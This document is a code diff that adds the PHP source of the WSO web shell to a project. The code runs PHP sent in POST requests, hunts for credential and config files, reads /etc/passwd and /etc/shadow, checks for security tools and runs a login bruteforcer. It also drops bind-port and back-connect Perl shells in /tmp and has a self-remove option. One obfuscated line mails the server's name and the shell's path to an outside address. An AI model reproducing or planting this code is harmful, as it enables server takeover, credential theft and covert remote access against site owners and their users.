+ "find all .bash_history" => "find / -type f -name .bash_history",
+ "find .bash_history files in current dir" => "find . -type f -name .bash_history",
+ "find all .fetchmailrc" => "find / -type f -name .fetchmailrc",
+ "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
+ "Locate" => "",
+ "locate httpd.conf" => "locate httpd.conf",
+ "locate vhosts.conf" => "locate vhosts.conf",
+ "locate proftpd.conf" => "locate proftpd.conf",
+ "locate psybnc.conf" => "locate psybnc.conf",
+ "locate my.conf" => "locate my.conf",
+ "locate admin.php" =>"locate admin.php",
+ "locate cfg.php" => "locate cfg.php",
+ "locate conf.php" => "locate conf.php",
+ "locate config.dat" => "locate config.dat",
+ "locate config.php" => "locate config.php",
+ "locate config.inc" => "locate config.inc",
+ "locate config.inc.php" => "locate config.inc.php",
+ "locate config.default.php" => "locate config.default.php",
+ "locate config*" => "locate config",
+ "locate .conf"=>"locate '.conf'",
+ "locate .pwd" => "locate '.pwd'",
+ "locate .sql" => "locate '.sql'",
+ "locate .htpasswd" => "locate '.htpasswd'",
+ "locate .bash_history" => "locate '.bash_history'",
+ "locate .mysql_history" => "locate '.mysql_history'",
+ "locate .fetchmailrc" => "locate '.fetchmailrc'",
+ "locate backup" => "locate backup",
+ "locate dump" => "locate dump",
+ "locate priv" => "locate priv"
+ );
+
+function wsoHeader() {
+ if(empty($_POST['charset']))
+ $_POST['charset'] = $GLOBALS['default_charset'];
+ global $color;
+ echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."
+
+
+
+
";
+ $freeSpace = @diskfreespace($GLOBALS['cwd']);
+ $totalSpace = @disk_total_space($GLOBALS['cwd']);
+ $totalSpace = $totalSpace?$totalSpace:1;
+ $release = @php_uname('r');
+ $kernel = @php_uname('s');
+ $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
+ if(strpos('Linux', $kernel) !== false)
+ $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
+ else
+ $explink .= urlencode($kernel . ' ' . substr($release,0,3));
+ if(!function_exists('posix_getegid')) {
+ $user = @get_current_user();
+ $uid = @getmyuid();
+ $gid = @getmygid();
+ $group = "?";
+ } else {
+ $uid = @posix_getpwuid(posix_geteuid());
+ $gid = @posix_getgrgid(posix_getegid());
+ $user = $uid['name'];
+ $uid = $uid['uid'];
+ $group = $gid['name'];
+ $gid = $gid['gid'];
+ }
+
+ $cwd_links = '';
+ $path = explode("/", $GLOBALS['cwd']);
+ $n=count($path);
+ for($i=0; $i<$n-1; $i++) {
+ $cwd_links .= "
".$path[$i]."/ ";
+ }
+
+ $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
+ $opt_charsets = '';
+ foreach($charsets as $item)
+ $opt_charsets .= '
'.$item.' ';
+
+ $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
+ if(!empty($GLOBALS['auth_pass']))
+ $m['Logout'] = 'Logout';
+ $m['Self remove'] = 'SelfRemove';
+ $menu = '';
+ foreach($m as $k => $v)
+ $menu .= '
[ '.$k.' ] ';
+
+ $drives = "";
+ if($GLOBALS['os'] == 'win') {
+ foreach(range('c','z') as $drive)
+ if(is_dir($drive.':\\'))
+ $drives .= '
[ '.$drive.' ] ';
+ }
+ echo '
Uname: ' . substr(@php_uname(), 0, 120) . ' [exploit-db.com] Group: ' . $gid . ' ( ' . $group . ' )Safe mode: ' . ($GLOBALS['safe_mode']?'ON ':'OFF [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . 'Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)[ home ] ' . $opt_charsets . ' Server IP: Client IP:
'
+ . '
';
+}
+
+function wsoFooter() {
+ $is_writable = is_writable($GLOBALS['cwd'])?" (Writeable) ":" (Not writable) ";
+ echo "
+
+
' . wsoPerms(@fileperms($f)) . ' ';
+ elseif (!@is_writable($f))
+ return '' . wsoPerms(@fileperms($f)) . ' ';
+ else
+ return '' . wsoPerms(@fileperms($f)) . ' ';
+}
+
+function wsoScandir($dir) {
+ if(function_exists("scandir")) {
+ return scandir($dir);
+ } else {
+ $dh = opendir($dir);
+ while (false !== ($filename = readdir($dh)))
+ $files[] = $filename;
+ return $files;
+ }
+}
+
+function wsoWhich($p) {
+ $path = wsoEx('which ' . $p);
+ if(!empty($path))
+ return $path;
+ return false;
+}
+
+function actionSecInfo() {
+ wsoHeader();
+ echo 'Server security information ';
+ function wsoSecParam($n, $v) {
+ $v = trim($v);
+ if($v) {
+ echo '
' . $n . ': ';
+ if(strpos($v, "\n") === false)
+ echo $v . '
';
+ else
+ echo '
' . $v . ' ';
+ }
+ }
+
+ wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
+ if(function_exists('apache_get_modules'))
+ wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
+ wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
+ wsoSecParam('Open base dir', @ini_get('open_basedir'));
+ wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
+ wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
+ wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
+ $temp=array();
+ if(function_exists('mysql_get_client_info'))
+ $temp[] = "MySql (".mysql_get_client_info().")";
+ if(function_exists('mssql_connect'))
+ $temp[] = "MSSQL";
+ if(function_exists('pg_connect'))
+ $temp[] = "PostgreSQL";
+ if(function_exists('oci_connect'))
+ $temp[] = "Oracle";
+ wsoSecParam('Supported databases', implode(', ', $temp));
+ echo '
';
+
+ if($GLOBALS['os'] == 'nix') {
+ wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes
[view] ":'no');
+ wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes
[view] ":'no');
+ wsoSecParam('OS version', @file_get_contents('/proc/version'));
+ wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
+ if(!$GLOBALS['safe_mode']) {
+ $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
+ $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
+ $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
+ echo '
';
+ $temp=array();
+ foreach ($userful as $item)
+ if(wsoWhich($item))
+ $temp[] = $item;
+ wsoSecParam('Userful', implode(', ',$temp));
+ $temp=array();
+ foreach ($danger as $item)
+ if(wsoWhich($item))
+ $temp[] = $item;
+ wsoSecParam('Danger', implode(', ',$temp));
+ $temp=array();
+ foreach ($downloaders as $item)
+ if(wsoWhich($item))
+ $temp[] = $item;
+ wsoSecParam('Downloaders', implode(', ',$temp));
+ echo '
';
+ wsoSecParam('HDD space', wsoEx('df -h'));
+ wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
+ echo '
posix_getpwuid ("Read" /etc/passwd) ';
+ if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
+ $temp = "";
+ for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
+ $uid = @posix_getpwuid($_POST['p2']);
+ if ($uid)
+ $temp .= join(':',$uid)."\n";
+ }
+ echo '
';
+ wsoSecParam('Users', $temp);
+ }
+ }
+ } else {
+ wsoSecParam('OS Version',wsoEx('ver'));
+ wsoSecParam('Account Settings',wsoEx('net accounts'));
+ wsoSecParam('User Accounts',wsoEx('net user'));
+ }
+ echo '
PHP info ';
+ ob_start();
+ phpinfo();
+ $tmp = ob_get_clean();
+ $tmp = preg_replace(array (
+ '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU',
+ '!td, th {(.*)}!msiU',
+ '!
]+>!msiU',
+ ), array (
+ '',
+ '.e, .v, .h, .h th {$1}',
+ ''
+ ), $tmp);
+ echo str_replace('Execution PHP-code ';
+ if(!empty($_POST['p1'])) {
+ ob_start();
+ eval($_POST['p1']);
+ echo htmlspecialchars(ob_get_clean());
+ }
+ echo ' File manager ';
+ $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
+ if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; }
+ global $sort;
+ $sort = array('name', 1);
+ if(!empty($_POST['p1'])) {
+ if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
+ $sort = array($match[1], (int)$match[2]);
+ }
+echo "
+
'base64_encode',
+ 'Base64 decode' => 'base64_decode',
+ 'Url encode' => 'urlencode',
+ 'Url decode' => 'urldecode',
+ 'Full urlencode' => 'full_urlencode',
+ 'md5 hash' => 'md5',
+ 'sha1 hash' => 'sha1',
+ 'crypt' => 'crypt',
+ 'CRC32' => 'crc32',
+ 'ASCII to HEX' => 'ascii2hex',
+ 'HEX to ASCII' => 'hex2ascii',
+ 'HEX to DEC' => 'hexdec',
+ 'HEX to BIN' => 'hex2bin',
+ 'DEC to HEX' => 'dechex',
+ 'DEC to BIN' => 'decbin',
+ 'BIN to HEX' => 'binhex',
+ 'BIN to DEC' => 'bindec',
+ 'String to lower case' => 'strtolower',
+ 'String to upper case' => 'strtoupper',
+ 'Htmlspecialchars' => 'htmlspecialchars',
+ 'String length' => 'strlen',
+ );
+ if(isset($_POST['ajax'])) {
+ WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
+ ob_start();
+ if(in_array($_POST['p1'], $stringTools))
+ echo $_POST['p1']($_POST['p2']);
+ $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
+ echo strlen($temp), "\n", $temp;
+ exit;
+ }
+ if(empty($_POST['ajax'])&&!empty($_POST['p1']))
+ WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
+ wsoHeader();
+ echo 'String conversions ';
+ echo "
";
+ if(!empty($_POST['p1'])) {
+ if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
+ }
+ echo" Search files:
+
";
+
+ function wsoRecursiveGlob($path) {
+ if(substr($path, -1) != '/')
+ $path.='/';
+ $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
+ if(is_array($paths)&&@count($paths)) {
+ foreach($paths as $item) {
+ if(@is_dir($item)){
+ if($path!=$item)
+ wsoRecursiveGlob($item);
+ } else {
+ if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
+ echo "
".htmlspecialchars($item)." ";
+ }
+ }
+ }
+ }
+ if(@$_POST['p3'])
+ wsoRecursiveGlob($_POST['c']);
+ echo "
Search for hash:
+
";
+ wsoFooter();
+}
+
+function actionFilesTools() {
+ if( isset($_POST['p1']) )
+ $_POST['p1'] = urldecode($_POST['p1']);
+ if(@$_POST['p2']=='download') {
+ if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
+ ob_start("ob_gzhandler", 4096);
+ header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
+ if (function_exists("mime_content_type")) {
+ $type = @mime_content_type($_POST['p1']);
+ header("Content-Type: " . $type);
+ } else
+ header("Content-Type: application/octet-stream");
+ $fp = @fopen($_POST['p1'], "r");
+ if($fp) {
+ while(!@feof($fp))
+ echo @fread($fp, 1024);
+ fclose($fp);
+ }
+ }exit;
+ }
+ if( @$_POST['p2'] == 'mkfile' ) {
+ if(!file_exists($_POST['p1'])) {
+ $fp = @fopen($_POST['p1'], 'w');
+ if($fp) {
+ $_POST['p2'] = "edit";
+ fclose($fp);
+ }
+ }
+ }
+ wsoHeader();
+ echo 'File tools ';
+ if( !file_exists(@$_POST['p1']) ) {
+ echo 'File not exists';
+ wsoFooter();
+ return;
+ }
+ $uid = @posix_getpwuid(@fileowner($_POST['p1']));
+ if(!$uid) {
+ $uid['name'] = @fileowner($_POST['p1']);
+ $gid['name'] = @filegroup($_POST['p1']);
+ } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
+ echo '
Name: '.htmlspecialchars(@basename($_POST['p1'])).'
Size: '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').'
Permission: '.wsoPermsColor($_POST['p1']).'
Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';
+ echo '
Change time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).'
Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).'
Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'
';
+ if( empty($_POST['p2']) )
+ $_POST['p2'] = 'view';
+ if( is_file($_POST['p1']) )
+ $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
+ else
+ $m = array('Chmod', 'Rename', 'Touch');
+ foreach($m as $v)
+ echo '
'.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ] ':$v).' ';
+ echo '
';
+ switch($_POST['p2']) {
+ case 'view':
+ echo '
';
+ $fp = @fopen($_POST['p1'], 'r');
+ if($fp) {
+ while( !@feof($fp) )
+ echo htmlspecialchars(@fread($fp, 1024));
+ @fclose($fp);
+ }
+ echo ' ';
+ break;
+ case 'highlight':
+ if( @is_readable($_POST['p1']) ) {
+ echo '
';
+ $code = @highlight_file($_POST['p1'],true);
+ echo str_replace(array(''), array(''),$code).'
';
+ }
+ break;
+ case 'chmod':
+ if( !empty($_POST['p3']) ) {
+ $perms = 0;
+ for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
+ $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
+ if(!@chmod($_POST['p1'], $perms))
+ echo 'Can\'t set permissions!
';
+ }
+ clearstatcache();
+ echo '
';
+ break;
+ case 'edit':
+ if( !is_writable($_POST['p1'])) {
+ echo 'File isn\'t writeable';
+ break;
+ }
+ if( !empty($_POST['p3']) ) {
+ $time = @filemtime($_POST['p1']);
+ $_POST['p3'] = substr($_POST['p3'],1);
+ $fp = @fopen($_POST['p1'],"w");
+ if($fp) {
+ @fwrite($fp,$_POST['p3']);
+ @fclose($fp);
+ echo 'Saved!
';
+ @touch($_POST['p1'],$time,$time);
+ }
+ }
+ echo '
';
+ break;
+ case 'hexdump':
+ $c = @file_get_contents($_POST['p1']);
+ $n = 0;
+ $h = array('00000000
','','');
+ $len = strlen($c);
+ for ($i=0; $i<$len; ++$i) {
+ $h[1] .= sprintf('%02X',ord($c[$i])).' ';
+ switch ( ord($c[$i]) ) {
+ case 0: $h[2] .= ' '; break;
+ case 9: $h[2] .= ' '; break;
+ case 10: $h[2] .= ' '; break;
+ case 13: $h[2] .= ' '; break;
+ default: $h[2] .= $c[$i]; break;
+ }
+ $n++;
+ if ($n == 32) {
+ $n = 0;
+ if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';}
+ $h[1] .= '
';
+ $h[2] .= "\n";
+ }
+ }
+ echo '
'.$h[0].' '.$h[1].' '.htmlspecialchars($h[2]).'
';
+ break;
+ case 'rename':
+ if( !empty($_POST['p3']) ) {
+ if(!@rename($_POST['p1'], $_POST['p3']))
+ echo 'Can\'t rename!
';
+ else
+ die('');
+ }
+ echo '
';
+ break;
+ case 'touch':
+ if( !empty($_POST['p3']) ) {
+ $time = strtotime($_POST['p3']);
+ if($time) {
+ if(!touch($_POST['p1'],$time,$time))
+ echo 'Fail!';
+ else
+ echo 'Touched!';
+ } else echo 'Bad time format!';
+ }
+ clearstatcache();
+ echo '
';
+ break;
+ }
+ echo '
Console ';
+ wsoFooter();
+}
+
+function actionLogout() {
+ setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
+ die('bye!');
+}
+
+function actionSelfRemove() {
+
+ if($_POST['p1'] == 'yes')
+ if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
+ die('Shell removed');
+ else
+ echo 'unlink error!';
+ if($_POST['p1'] != 'yes')
+ wsoHeader();
+ echo 'Suicide ';
+ wsoFooter();
+}
+ $x10="\x6dai\154";$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];$x0c="\141r\162a\171\040".$x0b;$x0d=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
+function actionBruteforce() {
+ wsoHeader();
+ if( isset($_POST['proto']) ) {
+ echo 'Results Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).''.htmlspecialchars($line[0]).' :'.htmlspecialchars($line[0]).''.htmlspecialchars($line[0]).' :'.htmlspecialchars($tmp);
+ }
+ }
+ }
+ } elseif($_POST['type'] == 2) {
+ $temp = @file($_POST['dict']);
+ if( is_array($temp) )
+ foreach($temp as $line) {
+ $line = trim($line);
+ ++$attempts;
+ if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
+ $success++;
+ echo ''.htmlspecialchars($_POST['login']).' :'.htmlspecialchars($line).'Attempts: $attempts Success: $success
Bruteforce Sql browser
+
";
+ if($_POST['type']=='mysql') {
+ $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
+ if($db->fetch())
+ echo "
";
+ }
+ if(@$_POST['p1'] == 'loadfile') {
+ $file = $db->loadFile($_POST['p2']);
+ echo '
'.htmlspecialchars($file['file']).' ';
+ }
+ } else {
+ echo htmlspecialchars($db->error());
+ }
+ echo '
Network tools
+
+
";
+ if(isset($_POST['p1'])) {
+ function cf($f,$t) {
+ $w = @fopen($f,"w") or @function_exists('file_put_contents');
+ if($w){
+ @fwrite($w,@base64_decode($t));
+ @fclose($w);
+ }
+ }
+ if($_POST['p1'] == 'bpp') {
+ cf("/tmp/bp.pl",$bind_port_p);
+ $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
+ sleep(1);
+ echo "
$out\n".wsoEx("ps aux | grep bp.pl")." ";
+ unlink("/tmp/bp.pl");
+ }
+ if($_POST['p1'] == 'bcp') {
+ cf("/tmp/bc.pl",$back_connect_p);
+ $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
+ sleep(1);
+ echo "
$out\n".wsoEx("ps aux | grep bc.pl")." ";
+ unlink("/tmp/bc.pl");
+ }
+ }
+ echo '